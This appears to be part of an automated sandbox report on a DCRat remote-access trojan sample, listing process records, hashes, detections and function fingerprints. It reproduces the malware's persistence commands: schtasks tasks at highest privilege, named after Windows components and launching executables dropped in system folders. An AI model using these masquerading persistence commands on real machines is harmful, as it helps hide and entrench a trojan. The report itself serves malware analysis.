Commandline:	schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Program Files (x86)\jdownloader\StartMenuExperienceHost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	12:57:01
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\jdownloader\StartMenuExperienceHost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	12:57:01
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPsM" /sc MINUTE /mo 12 /tr "'C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	12:57:01
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPs" /sc ONLOGON /tr "'C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	12:57:01
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPsM" /sc MINUTE /mo 13 /tr "'C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	12:57:01
Start date:	05/01/2025
Path:	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\internet explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe"
Imagebase:	0x7d0000
File size:	1'858'048 bytes
MD5 hash:	5D232371C6B04BF6E609EE14FC06F3F6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000001F.00000002.4145128324.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001F.00000002.4145128324.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 76%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	12:57:02
Start date:	05/01/2025
Path:	C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe
Imagebase:	0x2c0000
File size:	1'858'048 bytes
MD5 hash:	5D232371C6B04BF6E609EE14FC06F3F6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000020.00000002.1830308361.0000000002711000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 76%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	12:57:02
Start date:	05/01/2025
Path:	C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe
Imagebase:	0xcd0000
File size:	1'858'048 bytes
MD5 hash:	5D232371C6B04BF6E609EE14FC06F3F6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000021.00000002.1834388841.0000000003041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000021.00000002.1834388841.000000000307D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	12:57:02
Start date:	05/01/2025
Path:	C:\Recovery\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\RuntimeBroker.exe
Imagebase:	0x700000
File size:	1'858'048 bytes
MD5 hash:	5D232371C6B04BF6E609EE14FC06F3F6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000022.00000002.1847247519.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000022.00000002.1847247519.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 76%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	12:57:03
Start date:	05/01/2025
Path:	C:\Recovery\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\RuntimeBroker.exe
Imagebase:	0xf40000
File size:	1'858'048 bytes
MD5 hash:	5D232371C6B04BF6E609EE14FC06F3F6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000023.00000002.1847341933.00000000034B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	12:57:03
Start date:	05/01/2025
Path:	C:\Windows\twain_32\SgrmBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\twain_32\SgrmBroker.exe
Imagebase:	0x8b0000
File size:	1'858'048 bytes
MD5 hash:	5D232371C6B04BF6E609EE14FC06F3F6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000024.00000002.1848071162.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 76%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	12:57:03
Start date:	05/01/2025
Path:	C:\Windows\twain_32\SgrmBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\twain_32\SgrmBroker.exe
Imagebase:	0xcf0000
File size:	1'858'048 bytes
MD5 hash:	5D232371C6B04BF6E609EE14FC06F3F6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000025.00000002.1835126643.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	12:57:03
Start date:	05/01/2025
Path:	C:\ProgramData\sihost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\All Users\sihost.exe"
Imagebase:	0xb70000
File size:	1'858'048 bytes
MD5 hash:	5D232371C6B04BF6E609EE14FC06F3F6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000026.00000002.1846857363.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 76%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	12:57:03
Start date:	05/01/2025
Path:	C:\ProgramData\sihost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\All Users\sihost.exe"
Imagebase:	0x370000
File size:	1'858'048 bytes
MD5 hash:	5D232371C6B04BF6E609EE14FC06F3F6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000027.00000002.1846749984.00000000029BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000027.00000002.1846749984.0000000002981000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Function 00007FFD9B7E35A5 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1780740993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7e0000_jmBb9uY1B8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 466f77f93f5b59f643a5063bde85167714ee4d0a44ac2ea0419edcbdf758ae70
Instruction ID: 855348dc8c92fa1fa681f762a70ec3df3bdc0a4ea91cdf460341c7f161a29ff4
Opcode Fuzzy Hash: 466f77f93f5b59f643a5063bde85167714ee4d0a44ac2ea0419edcbdf758ae70
Instruction Fuzzy Hash: 62A1C471A19A4D8FEB95DB68D8657ED7BE1FF99300F4102BAD009D32E6DB782401CB01

Function 00007FFD9B7E1688 Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1780740993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7e0000_jmBb9uY1B8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54824b21dfbc056489f92b8b0713644e22b5fabaaefb87cebdc7b0e857120fde
Instruction ID: 0fe1c866a4d75a6156be39a835a78c10d9f2a84889e30ef66bf2df73b98f8ac5
Opcode Fuzzy Hash: 54824b21dfbc056489f92b8b0713644e22b5fabaaefb87cebdc7b0e857120fde
Instruction Fuzzy Hash: 8481CF31B0DB494FDB58DE5C88665A977E2EF98304B15027EE45EC32B2DE34AD028781

Function 00007FFD9B7F5420 Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1780740993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7e0000_jmBb9uY1B8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fe80bcd9f9550dbee9a8b523becabf2a3e9a4dfc16b9226b7a0df4966e8497e
Instruction ID: 0af67af3487877928e10eaab2ad0cbbf11d332e07b45c262e7fc42c4182d890e
Opcode Fuzzy Hash: 1fe80bcd9f9550dbee9a8b523becabf2a3e9a4dfc16b9226b7a0df4966e8497e
Instruction Fuzzy Hash: 05614171E09A1D8FDFA4EBA8D4557EDBBB1FF58301F50016AD00DD72A2DA3569818B80

Function 00007FFD9B7E1CED Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1780740993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7e0000_jmBb9uY1B8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7da1ed7d71778fb74a07ef8a6b7b949e967e7c50ffd5d49b14770ed8c1c9ce26
Instruction ID: 2ad453c9528685ac54c8a835a0f5544290eff681617a007d1da4b8550eed793a
Opcode Fuzzy Hash: 7da1ed7d71778fb74a07ef8a6b7b949e967e7c50ffd5d49b14770ed8c1c9ce26
Instruction Fuzzy Hash: 7651DE31B09B4A4FDB58CE5888655BA73E2FFD8301B15467EE45EC72A2CE34ED028781

Function 00007FFD9B7E31F5 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1780740993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7e0000_jmBb9uY1B8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ec07920cdb2f7b3e70196f9790818de6947130d9a86212935b18259d6be7c91
Instruction ID: 4bbdd86a235ec87a6aec190248b464023142aac33e7d4624ddf7c93058acc842
Opcode Fuzzy Hash: 1ec07920cdb2f7b3e70196f9790818de6947130d9a86212935b18259d6be7c91
Instruction Fuzzy Hash: 0E511B70E0961D8FEB65EB94C464AEDB7F1EF48310F52427AD009E72B5DE386A44CB50

Function 00007FFD9B7E2189 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1780740993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7e0000_jmBb9uY1B8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b8293bdef725a48d2a5bf23501951193454f06330882cd1009a8fde7792dae8
Instruction ID: f591e9c173e4e313a0525df52b7e204db0b72d9f990c39740028fc6ae3be8059
Opcode Fuzzy Hash: 9b8293bdef725a48d2a5bf23501951193454f06330882cd1009a8fde7792dae8
Instruction Fuzzy Hash: 4011BE30F1960E8FE715EBB488699B977E0EF06304F0245F6E41DC70B6EE38AA858751

Function 00007FFD9B7E084D Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1780740993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7e0000_jmBb9uY1B8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 289e30b259d029d40494a7f528b199ae8fa0e74f3d21c4b69aab5066cfc4c23f
Instruction ID: 37e7ff722c69514a6b34585865b6074eef317ad45f0fac11d474109ef4073a0d
Opcode Fuzzy Hash: 289e30b259d029d40494a7f528b199ae8fa0e74f3d21c4b69aab5066cfc4c23f
Instruction Fuzzy Hash: E7115731F0A64E9FE761ABB8C86A4E837E0FF01700F064676C089D60B6ED30A544C290

Function 00007FFD9B7E0A01 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1780740993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7e0000_jmBb9uY1B8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98633ebbd0bdf4253354eaab207ff604e0f66e81f58892dda6e807c527850299
Instruction ID: 7360e087925240d93a3acc43f28a8f9a497b4cfd8c36fa31faed98104631b765
Opcode Fuzzy Hash: 98633ebbd0bdf4253354eaab207ff604e0f66e81f58892dda6e807c527850299
Instruction Fuzzy Hash: F5118F31E1960E8FEB50EFA8885A5BD77E1FF58700F4246B6D419C61B6EE34A6408740

Function 00007FFD9B7E1140 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1780740993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7e0000_jmBb9uY1B8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ef3f5f1918c5fa0879e260457e830c79f7e0ab55f59d825a5128d33206c5435
Instruction ID: 3662f187c08f0301d37186b3c001a57f64c1fc2552c126a858981d742ed6893a
Opcode Fuzzy Hash: 2ef3f5f1918c5fa0879e260457e830c79f7e0ab55f59d825a5128d33206c5435
Instruction Fuzzy Hash: CA11E570E0960E8AEB68EBA8C4697BE77E0FF59304F00057EE41AD65F1DE356650C740

Function 00007FFD9B7E3525 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1780740993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7e0000_jmBb9uY1B8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 117104bb7e47bc2dc258f78ef98701a6e387e4c40b755eedc7f7e14a3170a19f
Instruction ID: 63637bb70d3c710627f34776ef36b309318adab8ff1c568c6ed60ab475bbecdc
Opcode Fuzzy Hash: 117104bb7e47bc2dc258f78ef98701a6e387e4c40b755eedc7f7e14a3170a19f
Instruction Fuzzy Hash: 74113970E1964E8FDB55EFA8C4696BA77A0FF18304F4205BED41AC62B1DA34A640C710

Function 00007FFD9B7E05D8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1780740993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7e0000_jmBb9uY1B8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32be394e09575a0a00ef009f4514928b28b6409a757ec7830cec2672da1e4085
Instruction ID: 25aa7b04738fa33a719f09687289ac213e09c4bd3eaceced5f0943b2df980e6b
Opcode Fuzzy Hash: 32be394e09575a0a00ef009f4514928b28b6409a757ec7830cec2672da1e4085
Instruction Fuzzy Hash: 92018030A0560E8EDB59EF64C4666B977A1EF58304F51057AD41EC65F4CA31A650C740

Function 00007FFD9B7E283D Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1780740993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7e0000_jmBb9uY1B8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34bb7115745c1a909c405dec199fbc0d5d0a0d036a64e767f7f2ca160b8a42d1
Instruction ID: 25a6e0480d79e78e869b771d7ae76cb00f610704efb9557c5802c561e5ae1437
Opcode Fuzzy Hash: 34bb7115745c1a909c405dec199fbc0d5d0a0d036a64e767f7f2ca160b8a42d1
Instruction Fuzzy Hash: A5018F30E5A64E8FE755EBA488585B977F0EF19300F4245B6D418C70B6EE38E694C710

Function 00007FFD9B7E1C65 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1780740993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7e0000_jmBb9uY1B8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 638f3c526abc75e34aec68150c5f7f8f202ba7d3a07ee65ada818bb51870766f
Instruction ID: 31f1bdfa9c0a2ddb257b8ea257b368e4945cb54eea1f8d557c9831de81bef7b7
Opcode Fuzzy Hash: 638f3c526abc75e34aec68150c5f7f8f202ba7d3a07ee65ada818bb51870766f
Instruction Fuzzy Hash: 2A018130A0A64E8FDB559F5484666BA37A0FF55304F51057AE80DC65F1CB35A950C740

Function 00007FFD9B7E2ED9 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1780740993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7e0000_jmBb9uY1B8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19963eb88c5988669d26978bc6283f43d4fd84e0160fb19bd1c54204ec43f523
Instruction ID: 7172908c14490c117b60bd1c8745267597db8be1e377b280bc382c6a0132abef
Opcode Fuzzy Hash: 19963eb88c5988669d26978bc6283f43d4fd84e0160fb19bd1c54204ec43f523
Instruction Fuzzy Hash: 32018471A1E74E8FD752E7B488695A97BE0EF09304F4605B3D408CB0B6DA38A6448711

Function 00007FFD9B7E343C Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1780740993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7e0000_jmBb9uY1B8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06d3d38017be86a6b41d0c0c91a4df62b940982261c1af49e792d06491f63c83
Instruction ID: eaba69e175634c88b8d1d55229e42f2473be5355c776f71dc63330ad0d90f8ec
Opcode Fuzzy Hash: 06d3d38017be86a6b41d0c0c91a4df62b940982261c1af49e792d06491f63c83
Instruction Fuzzy Hash: 89014F71E09A0E8EEB52FF6884585B97BE0FF19301F0209B6D419D7075EA34A6448750

Function 00007FFD9B7E0608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1780740993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7e0000_jmBb9uY1B8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dae888ef5f55f8eabebd296b8d2bd0fb0bce4bdb410b67c70401d93f58a8c51b
Instruction ID: 35591fc9d73d6cd682e85b2953707cd4c13841da19703e382e5a965825042109
Opcode Fuzzy Hash: dae888ef5f55f8eabebd296b8d2bd0fb0bce4bdb410b67c70401d93f58a8c51b
Instruction Fuzzy Hash: 9701D130A1560E8AEB68EFB4C4686BD37A0FF18305F51097ED41ED21F4DE35B280CA00

Function 00007FFD9B7E0610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1780740993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7e0000_jmBb9uY1B8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2af7bc151857e6c34cd76c13440836597404ea7c2b50baf4c19a642419b697e1
Instruction ID: 07ddd71c09420b1d25e8c764e9bf39776b4d5a33b5a588256e8d4c5308ab11c5
Opcode Fuzzy Hash: 2af7bc151857e6c34cd76c13440836597404ea7c2b50baf4c19a642419b697e1
Instruction Fuzzy Hash: 0A016D30A1960E9AEB68EBA4C4696B973E0FF18309F51097ED41ED21F5DE35A650C600

Function 00007FFD9B7E05D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1780740993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7e0000_jmBb9uY1B8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b63bfe3aa7712dd5101bf6e8dcca5b48fc8af9ea8da4a6f12d9ff6386094d55e
Instruction ID: fc8f02f6c411fe655d40531ebf536a0247cca477e6282e85d34de133c0b854ba
Opcode Fuzzy Hash: b63bfe3aa7712dd5101bf6e8dcca5b48fc8af9ea8da4a6f12d9ff6386094d55e
Instruction Fuzzy Hash: 9EF0C230E0A64E8FEB65EF6494666FA37A0EF45308F51057AE80EC25F1CE35A6A0C740

Function 00007FFD9B7E2759 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1780740993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7e0000_jmBb9uY1B8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f67025375cd92de7786e3f090a60a3644d5019bed9d5af085d255d4c91786e20
Instruction ID: def44d4317b2ebeb4cd9e3fc4ee67102d1f6c485a3f73b0b5a515a2be03ca793
Opcode Fuzzy Hash: f67025375cd92de7786e3f090a60a3644d5019bed9d5af085d255d4c91786e20
Instruction Fuzzy Hash: 9CF09631A0E38D8FDB6A9F7488652A93F70FF06304F4605BAD419C61F2DB38A554CB41

Function 00007FFD9B7E27CD Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1780740993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7e0000_jmBb9uY1B8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a1f2b38b3b63c775262b2bca70cc1b6e9762af3a28673a9177ca5841d55c56b
Instruction ID: ec771d4a23cb0f74c6488ea950f464b6fcf91c7ea2a6678629186a58ff849c46
Opcode Fuzzy Hash: 9a1f2b38b3b63c775262b2bca70cc1b6e9762af3a28673a9177ca5841d55c56b
Instruction Fuzzy Hash: 27F09031A0E78E8FEB699FA488291B97BE0FF55308F4205BAD409C60F6DB399554C741

Function 00007FFD9B7E0F49 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1780740993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7e0000_jmBb9uY1B8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0389636b3c065452eb495c26ee1bdbfca72082be498d3551e5d4bb1e54a9e4b5
Instruction ID: 17e89af5627b60797fab2b1093e99564509d5a9e64a3a8f8070510124ead0426
Opcode Fuzzy Hash: 0389636b3c065452eb495c26ee1bdbfca72082be498d3551e5d4bb1e54a9e4b5
Instruction Fuzzy Hash: 3BF01230A0950ECAEB24DB54D862BEE77B1EF94301F1142B5C009972B5DE746A818B80

Analysis Process: MwDxnowBVCiAiIllnkPs.exePID: 7744, Parent PID: 6784COMMON

Executed Functions

Function 00007FFD9BA8E09A Relevance: 1.8, Strings: 1, Instructions: 518COMMON

Download Yara Rule

Strings

B#_H, xrefs: 00007FFD9BA8E361

Memory Dump Source

Source File: 0000001F.00000002.4197470428.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9ba80000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID: B#_H
API String ID: 0-1870020394
Opcode ID: 1c4e9f2cc4ec37cd992cdd8d1fca3300a340607bf668a1b1ce8de5a78b8e193c
Instruction ID: a41ef414e2186e38690df91d19bd22eac17ccfbd672fdd1fbc0b39b13fcbb4bc
Opcode Fuzzy Hash: 1c4e9f2cc4ec37cd992cdd8d1fca3300a340607bf668a1b1ce8de5a78b8e193c
Instruction Fuzzy Hash: 4C126F70E09A4D8FDB69DFA8C4A06ADB7B1FF58300F1145BED04ED76A2DA74A941CB00

Function 00007FFD9BA9743D Relevance: 1.3, Instructions: 1305COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.4197470428.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9ba80000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 915092afa52c3cee2eecaca4dfbe8560773bc8f8c48d6b0a96c52f4b11b8bc0f
Instruction ID: 00aeb9bb2d5f8b2b6b1867e94d9c82a73a57a3de5301fc7934474466073cef41
Opcode Fuzzy Hash: 915092afa52c3cee2eecaca4dfbe8560773bc8f8c48d6b0a96c52f4b11b8bc0f
Instruction Fuzzy Hash: 42A2C330E0A64E8FEB65EB64C8656F977E0FF59310F0101BAD01DD71A2DF78AA458B50

